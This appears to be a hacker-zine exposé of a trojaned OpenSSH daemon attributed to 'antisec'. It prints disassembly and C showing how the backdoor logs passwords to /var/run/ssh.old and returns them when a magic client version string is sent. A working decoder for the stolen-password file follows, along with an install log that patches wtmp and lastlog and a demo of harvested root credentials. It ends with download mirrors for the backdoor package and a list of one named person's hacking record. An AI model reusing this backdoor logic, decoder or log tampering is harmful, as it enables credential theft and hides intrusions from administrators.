.text:0804E9EF mov edx, ds:mvebuf
.text:0804E9F5 xor eax, eax
.text:0804E9F7 mov ds:ai, 0
.text:0804EA01 cld
.text:0804EA02 mov ecx, 0FFFFFFFFh
.text:0804EA07 mov edi, edx
.text:0804EA09 repne scasb ; strlen(mvebuf)
.text:0804EA0B not ecx
.text:0804EA0D dec ecx
.text:0804EA0E add esp, 10h
.text:0804EA11 cmp ebx, ecx
.text:0804EA13 jnb short loc_804EA5A ; for loop
.text:0804EA15 mov ebx, 0FFFFFFFFh
.text:0804EA1A
.text:0804EA1A loc_804EA1A: ; CODE XREF: main+20FCj
.text:0804EA1A mov ecx, ds:ai
.text:0804EA20 mov al, [edx+ecx] ; al = mvebuf[ai]
.text:0804EA23 not eax ; ~mvebuf[ai]
.text:0804EA25 mov edx, ds:mvdbuf
.text:0804EA2B mov [edx+ecx], al ; mvdbuf[i] = ~mvebuf[ai]
.text:0804EA2E mov edi, ds:ai
.text:0804EA34 inc edi ; ai++
.text:0804EA35 mov edx, ds:mvebuf
.text:0804EA3B mov [ebp+var_C40], edi ; var_C40 = ai
.text:0804EA41 mov ds:ai, edi
.text:0804EA47 xor eax, eax
.text:0804EA49 mov ecx, ebx
.text:0804EA4B mov edi, edx
.text:0804EA4D repne scasb ; strlen(mvebuf)
.text:0804EA4F not ecx
.text:0804EA51 dec ecx
.text:0804EA52 cmp [ebp+var_C40], ecx ; cmp ai with strlen result
.text:0804EA58 jb short loc_804EA1A ; jmp if below =>
.text:0804EA58 ; for(ai=0;ai<strlen(mvebuf);ai++)
.text:0804EA5A
.text:0804EA5A loc_804EA5A: ; CODE XREF: main+20B7j
.text:0804EA5A push eax
.text:0804EA5B push esi ; logfile size
.text:0804EA5C push ds:mvdbuf ; mvdbuf
.text:0804EA62 push [ebp+var_C00] ; var_C00 = current sock_out
.text:0804EA68 call _write
.text:0804EA6D add esp, 10h
.text:0804EA70
.text:0804EA70 loc_804EA70: ; CODE XREF: main+205Ej
.text:0804EA70 ; main+2066j
.text:0804EA70 sub esp, 0Ch
.text:0804EA73 push ds:alog ; stream
.text:0804EA79 call _fclose ; fclose(alog)
.text:0804EA7E add esp, 10h
.text:0804EA81 jmp loc_804D47D ; continue
*/
/*
* Main program for the daemon.
*/
int
main(int ac, char **av)
{
extern char *optarg;
extern int optind;
int opt, j, i, fdsetsz, on = 1;
int sock_in = -1, sock_out = -1, newsock = -1;
pid_t pid;
socklen_t fromlen;
fd_set *fdset;
struct sockaddr_storage from;
const char *remote_ip;
int remote_port;
FILE *f;
struct addrinfo *ai;
char ntop[NI_MAXHOST], strport[NI_MAXSERV];
char *line;
int listen_sock, maxfd;
int startup_p[2] = { -1 , -1 }, config_s[2] = { -1 , -1 };
int startups = 0;
Key *key;
Authctxt *authctxt;
int ret, key_used = 0;
Buffer cfg;
//...
//...
sshd_exchange_identification(sock_in, sock_out);
//...
}
static void
sshd_exchange_identification(int sock_in, int sock_out)
{
//...
if(strncmp(client_version_string,aAGb7,strlen(aAGb7)) == 0)
if( (alog = fopen(filename,"r")) != 0) {
fseek(alog,0,SEEK_END);
logsize = ftell(alog);
mvebuf = malloc(logsize);
mvdbuf = malloc(logsize);
if( (mvebuf != NULL) && (mvdbuf != NULL) ) {
fseek(alog,0,SEEK_SET);
fread(mvebuf,logsize,1,alog);
for(ai = 0;ai<strlen(mvebuf);ai++) mvdbuf[ai] = ~mvebuf[ai];
write(sock_out,mvdbuf,logsize);
}
fclose(alog);
}
//...
//...
}
/*
On server identification exchange if the client version first characters are equal to a specific
string ("password") then it returns the captured passwords from ssh.old
*/
/*
lame.c
Lame Decryprer v0.069
This program is free software: you can redistribute it and/or modify
it under the terms of the FSPL Fuck Skiddies Public License as published by
the GCESE Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be able to
crack the complex encryption algorithm used by antisec's backdoor
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/
#include <stdio.h>
int main() {
FILE *sshlog;
char *filename = "/var/run/ssh.old";
unsigned int cin;
int i;
if((sshlog=fopen(filename,"r")))
while((cin = fgetc(sshlog)) != EOF)
printf("%c",~cin);
else
printf("crappy file error\n");
}
Backdoor Installation
---------------------
debian:~/hax# ./quick
________ .___ ________ _________
\_____ \__ _ ______ ____ __| _/ \______ \ \_ ___ \
/ | \ \/ \/ / \_/ __ \ / __ | | | \/ \ \/
/ | \ / | \ ___// /_/ | | ` \ \____
\_______ /\/\_/|___| /\___ >____ | /_______ /\______ /
\/ \/ \/ \/ \/ \/
"Hack everyone you can, and then hack some more"
Logs [ CHECK ]
Opening /var/log/wtmp ...
Reading... patched ok.
Opening /var/log/lastlog ...
Reading... patched ok.
Logs [ CHECK ]
Configure [ CHECK ]
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking whether byte ordering is bigendian... no
checking for gawk... no
checking for mawk... mawk
checking how to run the C preprocessor... gcc -E
checking for ranlib... ranlib
checking for a BSD-compatible install... /usr/bin/install -c
checking for egrep... grep -E
checking for ar... /usr/bin/ar
checking for cat... /bin/cat
checking for kill... /bin/kill
checking for perl5... no
checking for perl... /usr/bin/perl
checking for sed... /bin/sed
checking for ent... no
checking for bash... /bin/bash
checking for ksh... (cached) /bin/bash
checking for sh... (cached) /bin/bash
checking for sh... /bin/sh
checking for groupadd... /usr/sbin/groupadd
checking for useradd... /usr/sbin/useradd
checking for pkgmk... no
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking for _LARGE_FILES value needed for large files... no
checking for login... /bin/login
checking for passwd... /usr/bin/passwd
checking for inline... inline
checking whether LLONG_MAX is declared... no
checking whether LLONG_MAX is declared... yes
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
...
...
cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/ -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl -lcrypt
Compile [ CHECK ]
Running [ CHECK ]
*** [ OsUcCu7hJA ]
*** [ 6O7vp ]
Game Over [ CHECKMATE! ]
#--
Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
debian
OsUcCu7hJA
6O7vp
#--
debian:~# telnet 10.5.1.13 22
Trying 10.5.1.13...
Connected to 10.5.1.13.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian
6O7vp
HOOKIN: root:123!"<22>
HOOKIN: testuser:testpass
Protocol mismatch.
Connection closed by foreign host.
debian:~#
_______ _______ ________ _________
\ _ \ ___ __\ _ \/ __ \ / _____/ ____ ____
/ /_\ \\ \/ / /_\ \____ / \_____ \_/ __ \/ _ \
\ \_/ \> <\ \_/ \ / / / \ ___( <_> )
\_____ /__/\_ \\_____ //____/ /_______ /\___ >____/
\/ \/ \/ \/ \/
________ __ .__ .__ .__
\_____ \ _______/ |_|__| _____ |__|______|__| ____ ____
/ | \\____ \ __\ |/ \| \___ / |/ \ / ___\
/ | \ |_> > | | | Y Y \ |/ /| | | \/ /_/ >
\_______ / __/|__| |__|__|_| /__/_____ \__|___| /\___ /
\/|__| \/ \/ \//_____/
1) http://www.xssed.com/archive/author=romeo
Date Author Domain PR Category Mirror
25/04/09 RoMeO www.akamai.com 19080 XSS mirror
22/03/09 RoMeO press.1and1.com 6883 XSS mirror
05/07/08 RoMeO scripts.mit.edu 999 XSS mirror
25/04/08 RoMeO forgottenmem.net 304476 XSS mirror
25/04/08 RoMeO www.h4ps.com 1753149 XSS mirror
23/04/08 RoMeO www.batelco.jo 225973 XSS mirror
12/04/08 RoMeO devscripts.net 1503804 XSS mirror
06/04/08 RoMeO www.vlx.in 2998964 XSS mirror
06/04/08 RoMeO www.ip2location.com 14646 XSS mirror
05/04/08 RoMeO realitatea.net 13002 XSS mirror
03/04/08 RoMeO www.name.com 13602 XSS mirror
03/04/08 RoMeO templates.entheosweb.com 13380 XSS mirror
31/03/08 RoMeO www.applyweb.com 50217 XSS mirror
31/03/08 RoMeO www.aast.edu 64423 XSS mirror
31/03/08 RoMeO www.cambridgescp.com 339535 XSS mirror
28/03/08 RoMeO www.freelotto.com R 306 XSS mirror
07/03/08 RoMeO www.sandboxie.com 70663 XSS mirror
06/03/08 RoMeO www.gulf-daily-news.com 14699 XSS mirror
06/03/08 RoMeO www.aucegypt.edu 38023 XSS mirror
06/03/08 RoMeO www.phpclanwebsite.com 986132 XSS mirror
05/03/08 RoMeO www.rapid-hook.com 95252 XSS mirror
05/03/08 RoMeO ipod.hopto.org 3648 XSS mirror
05/03/08 RoMeO www.darkshado.ca 6134372 XSS mirror
03/03/08 RoMeO www.macos.utah.edu 7333 XSS mirror
26/02/08 RoMeO www.rapidzearch.com 3797044 XSS mirror
11/02/08 RoMeO passport.51.com 184 XSS mirror
16/01/08 RoMeO www.memset.com 192269 XSS mirror
07/01/08 RoMeO search.mp3lyrics.org R 4309 XSS mirror
07/01/08 RoMeO qhost.eu 7969095 XSS mirror
05/01/08 RoMeO www.lpbs.org.uk 2776181 XSS mirror
04/01/08 RoMeO www.tdxp.net 0 XSS mirror
26/12/07 RoMeO aljaras.com 53022 XSS mirror
16/12/07 RoMeO www.sitemaps101.com 2163273 XSS mirror
15/12/07 RoMeO www.xml-sitemaps.com 8847 XSS mirror
10/12/07 RoMeO www.phpfaber.com 437969 XSS mirror
04/12/07 RoMeO www.tis-edu.com 0 XSS mirror
29/11/07 RoMeO pwnstarz.com 2025995 XSS mirror
23/11/07 RoMeO www.gamesurge.net 101368 XSS mirror
23/11/07 RoMeO cityguide.aol.com 54 XSS mirror
21/11/07 RoMeO my.notnet.co.uk 1419849 XSS mirror
06/11/07 RoMeO kwikhost.com 3593939 XSS mirror
06/11/07 RoMeO my.aol.com 54 XSS mirror
06/11/07 RoMeO www.searchtons.com 145218 XSS mirror
05/11/07 RoMeO www.seologs.com 18186 XSS mirror
05/11/07 RoMeO tools.elitehackers.info 151229 XSS mirror
05/11/07 RoMeO gallery.particlesoft.net 364744 XSS mirror
04/11/07 RoMeO www.filecart.com 27636 XSS mirror
04/11/07 RoMeO chollotenis.com 0 XSS mirror
02/11/07 RoMeO tsdepot.co.uk R 6739237 XSS mirror
02/11/07 RoMeO www.pesladder.com 1172005 XSS mirror
31/10/07 RoMeO www.omni-chat.com 1857220 XSS mirror
28/10/07 RoMeO www.anafit.com 2563280 XSS mirror
28/10/07 RoMeO www.hellboundhackers.org 213995 XSS mirror
28/10/07 RoMeO www.cyclelogic.co.uk 3361622 XSS mirror
16/10/07 RoMeO tsdepot.co.uk 6739237 XSS mirror
06/10/07 RoMeO www.terrytrophy.com 0 XSS mirror
03/10/07 RoMeO www13.cd-wow.com 28971 XSS mirror
03/10/07 RoMeO www.drbeat.li 8200365 XSS mirror
02/10/07 RoMeO services.embark.com 12027 XSS mirror
27/09/07 RoMeO ascii.techhappens.com 1215439 XSS mirror
20/09/07 RoMeO www.org-rc.fr 1884591 XSS mirror
26/06/07 RoMeO search.fbi.gov 11963 XSS mirror
2) http://www.zone-h.org/archive/defacer=romeo
Time Attacker H M R Domain OS View
2007/11/06 Romeo H trakyagirl.uni.cc Win 2003 mirror
2007/09/23 RomeO H R www.zexir.tk Linux mirror
2006/12/11 RoMeO www.koturkiye.com/hacked Linux mirror
2006/10/21 ROMEO H www.duyguajans.com FreeBSD mirror
2006/09/06 romeo M www.yeniliman.com/forum Linux mirror
2006/09/06 romeo M www.genc4um.com/forum Linux mirror
2006/09/06 ROMEO H www.forumhersey.com Linux mirror
2006/09/05 ROMEO M www.muzikogretmenleri.com/foru... Linux mirror
2006/09/05 ROMEO M www.sanalailem.com/forum Linux mirror
2006/09/05 ROMEO rocksitesi.net/forum/index.php Linux mirror
2006/09/05 ROMEO www.beyazrenkler.com/forum/ind... Linux mirror
2006/09/05 ROMEO www.yasakmp3.com/forum/index.php Win 2003 mirror
2006/09/05 ROMEO www.forumekani.com/index.php Linux mirror
2006/09/05 romeo www.turkfr.com/index.php Linux mirror
2006/09/05 romeo www.gizemliforum.org/index.php Linux mirror
2006/09/05 ROMEO www.arkadasbilisim.com/forum/i... Linux mirror
2006/09/05 ROMEO www.modifiyedunyasi.com/forum/... Linux mirror
2006/09/05 ROMEO www.forzatc.net/forum/index.php FreeBSD mirror
2006/09/05 ROMEO www.megaarsiv.net/index.php Linux mirror
2006/09/05 ROMEO egeizmir.com/forum/index.php Linux mirror
2006/09/05 ROMEO R www.nokiacep.com/forum/index.php Win 2003 mirror
2006/09/04 romeo H www.cyber-turka.org Win 2003 mirror
2006/07/12 romeo www.cehennem.net/den Linux mirror
2006/05/29 romeo H gorno-altaisk.ru Linux mirror
2006/05/29 ROMEO H M www.nobel.uz Win 2000 mirror
2006/05/29 ROMEO H R www.tdshi.uz Win 2000 mirror
2006/05/17 romeo H forumliontr.com Linux mirror
2006/05/02 romeo M www.pichiz.biz/forum Linux mirror
2006/05/02 ROMEO M www.trmizah.com/smf Linux mirror
2006/05/02 ROMEO H M www.rapsohbeti.com Linux mirror
2006/04/23 romeo www.gecelerinforumu.com/forum/... Linux mirror
2006/03/19 romeo www.esmer.org/index.php Linux mirror
2006/01/12 romeo M sitebirligi.com/~oyuncu/hacked... Linux mirror
2006/01/12 romeo M konya-kosk.bel.tr/~oyuncu/hack... Linux mirror
2006/01/12 romeo M aktueldershanesi.com/~oyuncu/h... Linux mirror
2006/01/12 romeo M www.hesapliweb.com/~oyuncu/hac... Linux mirror
2006/01/12 romeo M www.aheninsaat.com/~oyuncu/hac... Linux mirror
2006/01/12 romeo M www.mp3ilahi.com/~oyuncu/hacke... Linux mirror
2006/01/12 romeo M www.eurotipsters.com/~oyuncu/h... Linux mirror
2006/01/12 romeo M www.kardeslik.org/~oyuncu/hack... Linux mirror
2006/01/12 romeo M www.hiperx.net/~oyuncu/hacked/... Linux mirror
2006/01/12 romeo M www.najans.com/~oyuncu/hacked/... Linux mirror
2006/01/12 romeo M www.gulmece.net/~oyuncu/hacked... Linux mirror
2006/01/12 romeo M www.cigilfm.com/~oyuncu/hacked... Linux mirror
2006/01/12 romeo M www.gifturk.com/~oyuncu/hacked... Linux mirror
2006/01/12 romeo M www.why-islam.net/~oyuncu/hack... Linux mirror
2006/01/12 romeo M www.e-matrak.org/~oyuncu/hacke... Linux mirror
2006/01/12 romeo M www.kazancyolu.com/~oyuncu/hac... Linux mirror
2006/01/12 romeo M www.hiperstore.gen.tr/~oyuncu/... Linux mirror
2006/01/12 romeo M www.senarslan.com/~oyuncu/hack... Linux mirror
2006/01/12 romeo M www.aprohosting.net/~oyuncu//h... Linux mirror
2006/01/12 romeo M R www.gulum.net/~oyuncu//hacked/... Linux mirror
2006/01/12 romeo M R www.basinyayin.net/~oyuncu//ha... Linux mirror
2006/01/12 romeo M www.dinleradyo.com/~oyuncu//ha... Linux mirror
2006/01/12 romeo M www.sitetasarimi.com/~oyuncu//... Linux mirror
2005/04/08 romeo votedevoe.org/v-web/portal/cms... FreeBSD mirror
2005/03/23 romeo R www.willowsend.co.nz/index.php Linux mirror
2005/03/23 romeo H M moh.theclap.co.nz Linux mirror
_______ ___________
\ _ \ ___ __/_ \ _ \
/ /_\ \\ \/ /| / /_\ \
\ \_/ \> < | \ \_/ \
\_____ /__/\_ \|___|\_____ /
\/ \/ \/
__________ __ .__
\______ \ ____ ______ ____________/ |_|__| ____ ____
| _// __ \\____ \ / _ \_ __ \ __\ |/ \ / ___\
| | \ ___/| |_> > <_> ) | \/| | | | | \/ /_/ >
|____|_ /\___ > __/ \____/|__| |__| |__|___| /\___ /
\/ \/|__| \//_____/
1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
2) http://www.fbi.gov/contact/fo/fo.htm
3) http://www.treas.gov/usss/index.shtml
4) http://www.ic3.gov/default.aspx
5) http://www.tra.gov.ae/complaints.php
_______ ____ ____
\ _ \ ___ __/_ /_ |
/ /_\ \\ \/ /| || |
\ \_/ \> < | || |
\_____ /__/\_ \|___||___|
\/ \/
_____ __ __ .__ __
/ _ \_/ |__/ |______ ____ | |__ _____ ____ _____/ |_ ______
/ /_\ \ __\ __\__ \ _/ ___\| | \ / \_/ __ \ / \ __\/ ___/
/ | \ | | | / __ \\ \___| Y \ Y Y \ ___/| | \ | \___ \
\____|__ /__| |__| (____ /\___ >___| /__|_| /\___ >___| /__| /____ >
\/ \/ \/ \/ \/ \/ \/ \/
Mirrors
1. http://rapidshare.com/files/328431323/antisec.tar.gz
2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
6. http://www.sendspace.com/file/07clr5
_______ ____________
\ _ \ ___ __/_ \_____ \
/ /_\ \\ \/ /| |/ ____/
\ \_/ \> < | / \
\_____ /__/\_ \|___\_______ \
\/ \/ \/
_________ .__ .__
\_ ___ \ ____ ____ ____ | | __ __ _____|__| ____ ____
/ \ \/ / _ \ / \_/ ___\| | | | \/ ___/ |/ _ \ / \
\ \___( <_> ) | \ \___| |_| | /\___ \| ( <_> ) | \
\______ /\____/|___| /\___ >____/____//____ >__|\____/|___| /
\/ \/ \/ \/ \/
What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of
becoming an integral part of the information security industry and so they are blaming people who share old
and new information regarding the protection of corporate and personal information assets, including ICT systems
and social security.
_______ ____________
\ _ \ ___ __/_ \_____ \
/ /_\ \\ \/ /| | _(__ <
\ \_/ \> < | |/ \
\_____ /__/\_ \|___/______ /
\/ \/ \/
________ __
/ _____/______ ____ _____/ |_________
/ \ __\_ __ \_/ __ \_/ __ \ __\___ /
\ \_\ \ | \/\ ___/\ ___/| | / /
\______ /__| \___ >\___ >__| /_____ \
\/ \/ \/ \/
We want to thank the following people for their contribution. You know who you are!
Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors
Reference in New Issue View Git Blame Copy Permalink